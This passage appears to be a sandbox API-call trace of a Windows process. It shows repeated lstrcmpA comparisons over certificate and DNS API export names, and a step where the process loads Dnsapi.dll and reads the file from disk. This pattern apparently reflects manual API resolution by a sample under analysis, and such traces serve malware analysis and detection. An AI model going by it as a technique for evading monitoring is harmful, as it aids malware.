lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.072] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.072] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0252.072] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.072] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.073] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0252.073] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0252.073] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.074] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.074] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.074] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.074] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.074] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.074] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.075] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0252.075] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0252.075] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0252.075] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0252.075] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0252.076] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.076] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.077] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.077] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.077] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0252.077] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0252.077] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0252.077] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0252.077] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.077] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.078] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.079] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0252.080] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0252.080] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0252.080] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0252.096] GetProcessHeap () returned 0x4e0000 [0252.096] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x40ed040 | out: hHeap=0x4e0000) returned 1 [0252.220] GetProcessHeap () returned 0x4e0000 [0252.220] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f91a0 [0252.221] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0252.234] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0252.235] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0252.235] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0252.236] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0252.236] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0252.236] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0252.236] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0252.236] GetProcessHeap () returned 0x4e0000 [0252.236] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xa7b88) returned 0x3a5d010 [0252.238] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0252.238] ReadFile (in: hFile=0x17c, lpBuffer=0x3a5d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a5d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0252.395] CloseHandle (hObject=0x17c) returned 1 [0252.395] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0252.395] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.395] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0252.395] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.395] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.395] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0252.395] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.395] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.395] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0252.396] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0252.396] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.396] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.396] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0252.396] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0252.396] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0252.396] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.396] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.396] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0252.396] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0252.396] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.396] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0252.396] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.396] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.396] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0252.396] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0252.396] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.396] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0252.396] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0252.397] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.397] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.397] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0252.397] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0252.397] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.397] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0252.397] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0252.397] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0252.397] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0252.398] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.398] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0252.398] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.398] lstrcmpA (lpString1="DnsAllocateRecord", 